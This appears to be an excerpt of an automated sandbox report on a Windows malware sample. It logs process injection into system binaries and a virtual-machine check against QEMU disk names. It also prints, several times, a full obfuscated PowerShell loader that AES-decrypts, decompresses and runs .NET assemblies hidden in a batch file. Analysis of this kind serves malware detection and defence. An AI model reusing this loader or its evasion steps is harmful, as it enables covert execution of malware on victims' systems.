Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 192913B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 139F96A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C3D1EA0000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object system.io.memorystream(,$juoou);'.replace('', ''); invoke-expression '$jwqor=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$zxhyn=new-object system.io.compression.gzipstream($fppma, [io.compression.compressionmode]::decompress);'.replace('', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[system.reflection.assembly]::load([byte[]]$juoou);'.replace('', ''); invoke-expression '$cmubr=$tpeqt.entrypoint;'.replace('', ''); invoke-expression '$cmubr.invoke($null, $dozwz);'.replace('', '');}$tyrmi = 'c:\users\user\desktop\nhoqafkhhl.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([convert]::frombase64string($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$eti = qsuou (pchco ([convert]::frombase64string($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$gpc = qsuou (pchco ([convert]::frombase64string($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object system.io.memorystream(,$juoou);'.replace('', ''); invoke-expression '$jwqor=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$zxhyn=new-object system.io.compression.gzipstream($fppma, [io.compression.compressionmode]::decompress);'.replace('', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[system.reflection.assembly]::load([byte[]]$juoou);'.replace('', ''); invoke-expression '$cmubr=$tpeqt.entrypoint;'.replace('', ''); invoke-expression '$cmubr.invoke($null, $dozwz);'.replace('', '');}$tyrmi = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([convert]::frombase64string($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$eti = qsuou (pchco ([convert]::frombase64string($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$gpc = qsuou (pchco ([convert]::frombase64string($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object system.io.memorystream(,$juoou);'.replace('', ''); invoke-expression '$jwqor=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$zxhyn=new-object system.io.compression.gzipstream($fppma, [io.compression.compressionmode]::decompress);'.replace('', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[system.reflection.assembly]::load([byte[]]$juoou);'.replace('', ''); invoke-expression '$cmubr=$tpeqt.entrypoint;'.replace('', ''); invoke-expression '$cmubr.invoke($null, $dozwz);'.replace('', '');}$tyrmi = 'c:\users\user\desktop\nhoqafkhhl.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([convert]::frombase64string($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$eti = qsuou (pchco ([convert]::frombase64string($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$gpc = qsuou (pchco ([convert]::frombase64string($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object system.io.memorystream(,$juoou);'.replace('', ''); invoke-expression '$jwqor=new-object system.io.memorystream;'.replace('', ''); invoke-expression '$zxhyn=new-object system.io.compression.gzipstream($fppma, [io.compression.compressionmode]::decompress);'.replace('', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[system.reflection.assembly]::load([byte[]]$juoou);'.replace('', ''); invoke-expression '$cmubr=$tpeqt.entrypoint;'.replace('', ''); invoke-expression '$cmubr.invoke($null, $dozwz);'.replace('', '');}$tyrmi = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([convert]::frombase64string($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$eti = qsuou (pchco ([convert]::frombase64string($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('', '');invoke-expression '$gpc = qsuou (pchco ([convert]::frombase64string($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\winlogon.exe

Code function: 8_3_000001E858962AF0 cpuid

8_3_000001E858962AF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
